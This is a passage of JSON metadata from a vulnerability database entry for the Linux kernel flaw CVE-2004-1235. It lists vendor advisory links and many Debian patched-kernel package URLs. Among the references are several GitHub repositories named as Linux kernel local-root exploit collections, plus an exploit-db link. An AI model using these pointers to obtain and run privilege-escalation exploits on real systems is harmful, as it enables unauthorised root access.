        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2005-016j.html"
      },
      {
        "title": "RHSA-2005:017",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2005-017j.html"
      },
      {
        "title": "RHSA-2005:092",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2005-092j.html"
      },
      {
        "title": "TLSA-2005-29",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/security/2005/tlsa-2005-29j.txt"
      },
      {
        "title": "Ubuntu Security Notice: linux-source-2.6.8.1 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-57-1"
      },
      {
        "title": "Red Hat: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-2005043 - security advisory"
      },
      {
        "title": "Red Hat: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-2005016 - security advisory"
      },
      {
        "title": "Red Hat: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-2005017 - security advisory"
      },
      {
        "title": "Red Hat: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-2005092 - security advisory"
      },
      {
        "title": "Debian Security Advisories: DSA-1069-1 kernel-source-2.4.18 -- several vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=8f142ef483ef182da579a853641273b4"
      },
      {
        "title": "Debian Security Advisories: DSA-1067-1 kernel-source-2.4.16 -- several vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=b7e58f3ba3a41c2f220a9b5beec79066"
      },
      {
        "title": "Debian Security Advisories: DSA-1070-1 kernel-source-2.4.19 -- several vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=43028482bc5e84e25f6599c9be08b557"
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/shadowshusky/linux-kernel-exploits "
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/feng4/linux-kernel-exploits "
      },
      {
        "title": "Linux-kernel-EoP-exp",
        "trust": 0.1,
        "url": "https://github.com/de4dcr0w/linux-kernel-eop-exp "
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/zyjsuper/linux-kernel-exploits "
      },
      {
        "title": "linux-exp",
        "trust": 0.1,
        "url": "https://github.com/qchilan/linux-exp "
      },
      {
        "title": "LinuxEelvation",
        "trust": 0.1,
        "url": "https://github.com/al1ex/linuxeelvation "
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/straight-wood/linux-kernel-exploits "
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/yige666/linux-kernel-exploits "
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/kumardineshwar/linux-kernel-exploits "
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/vahalen/linux-kernel-exploits "
      },
      {
        "title": "linux-exp",
        "trust": 0.1,
        "url": "https://github.com/coffee727/linux-exp "
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/m0mkris/linux-kernel-exploits "
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/xssfile/linux-kernel-exploits "
      },
      {
        "title": "LinuxElevation",
        "trust": 0.1,
        "url": "https://github.com/al1ex/linuxelvation "
      },
      {
        "title": "LinuxEelvation",
        "trust": 0.1,
        "url": "https://github.com/fei9747/linuxeelvation "
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/c0dak/linux-kernel-exploits "
      },
      {
        "title": "local-root-exploit-",
        "trust": 0.1,
        "url": "https://github.com/sohaip-hackerdz/local-root-exploit- "
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/xfinest/linux-kernel-exploits "
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/secwiki/linux-kernel-exploits "
      },
      {
        "title": "Localroot-ALL-CVE",
        "trust": 0.1,
        "url": "https://github.com/snoopy-sec/localroot-all-cve "
      },
      {
        "title": "linux-kernel-exploits",
        "trust": 0.1,
        "url": "https://github.com/micr067/linux-kernel-exploits "
      },
      {
        "title": "LinuxElevation",
        "trust": 0.1,
        "url": "https://github.com/al1ex/linuxelevation "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2004-1235"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000008"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-1235"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "http://www.securityfocus.com/bid/12190"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/advisories/7804"
      },
      {
        "trust": 1.8,
        "url": "http://www.debian.org/security/2006/dsa-1067"
      },
      {
        "trust": 1.8,
        "url": "http://www.debian.org/security/2006/dsa-1069"
      },
      {
        "trust": 1.8,
        "url": "http://www.debian.org/security/2006/dsa-1070"
      },
      {
        "trust": 1.8,
        "url": "http://www.debian.org/security/2006/dsa-1082"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/advisories/7806"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/advisories/7805"
      },
      {
        "trust": 1.8,
        "url": "https://bugzilla.fedora.us/show_bug.cgi?id=2336"
      },
      {
        "trust": 1.8,
        "url": "http://www.mandriva.com/security/advisories?name=mdksa-2005:022"
      },
      {
        "trust": 1.8,
        "url": "http://isec.pl/vulnerabilities/isec-0021-uselib.txt"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2005-016.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2005-017.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2005-043.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2005-092.html"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/20162"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/20163"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/20202"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/20338"
      },
      {
        "trust": 1.8,
        "url": "http://www.novell.com/linux/security/advisories/2005_01_sr.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.trustix.org/errata/2005/0001/"
      },
      {
        "trust": 1.7,
        "url": "http://distro.conectiva.com.br/atualizacoes/index.php?id=a\u0026anuncio=000930"
      },
      {
        "trust": 1.2,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9567"
      },
      {
        "trust": 1.2,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/18800"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/13756/"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=110512575901427\u0026w=2"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-1235"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-1235"
      },
      {
        "trust": 0.8,
        "url": "http://www.securiteam.com/unixfocus/5gp022kekq.html"
      },
      {
        "trust": 0.8,
        "url": "http://securitytracker.com/alerts/2005/jan/1012810.html"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/18800"
      },
      {
        "trust": 0.6,
        "url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=110512575901427\u0026w=2"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/13232/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/13469/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/13308/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/13822/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/11464/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/product/143/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/10533/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/13126/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/11943/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/13627/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/14570/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/11861/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/13784/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/14295/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/13493/"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/elmodocs2/security/asa-2005-034_rhsa-2005-016rhsa-2006-017rhsa-2005-043.pdf"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2005-043.html"
      },
      {
        "trust": 0.3,
        "url": "https://rhn.redhat.com/errata/rhsa-2005-092.html"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/386399"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=bugtraq\u0026amp;m=110512575901427\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://distro.conectiva.com.br/atualizacoes/index.php?id=a\u0026amp;anuncio=000930"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=8612"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/57-1/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/exploits/744/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/20162/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-doc-2.4.16_2.4.16-1woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-headers-2.4.16_20040419woody1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.us.debian.org/security/2006/dsa-1067"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.5.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium_011226.18_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-source-2.4.17-hppa_32.5_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_security_specialist/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r5k-ip22_2.4.17-0.020226.2.woody7_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_m68k.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley_011226.18_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-image-apus_2.4.17-6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody4_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-headers-2.4.17-apus_2.4.17-6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-image-2.4.17-apus_2.4.17-6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-doc-2.4.17_2.4.17-1woody4_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64_32.5_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-ip22_2.4.17-0.020226.2.woody7_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium-smp_011226.18_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32_32.5_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-headers-2.4.17-ia64_011226.18_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley-smp_011226.18_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/20338/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-source-2.4.17-ia64_011226.18_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64-smp_32.5_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-kn04_2.4.17-0.020226.2.woody7_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.5.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.18.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.18.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r3k-kn02_2.4.17-0.020226.2.woody7_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody7_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody7_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/mips-tools_2.4.17-0.020226.2.woody7_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.us.debian.org/security/2006/dsa-1082"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32-smp_32.5_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-headers-2.4.17_2.4.17-2.woody.5_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-headers-2.4.17-hppa_32.5_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://www.us.debian.org/security/2006/dsa-1070"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/20163/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u_26woody1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.18-sparc_22woody1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u-smp_22woody1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u_22woody1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.19-sparc_26woody1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u-smp_26woody1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-alpha_2.4.18-15woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://www.us.debian.org/security/2006/dsa-1069"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-headers-2.4.18_2.4.18-1woody6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody6.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-benh/kernel-patch-benh_20020304woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1-smp_2.4.18-15woody1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k6_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/20202/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-386_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody6_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1_2.4.18-15woody1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686-smp_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-586tsc_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k7_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
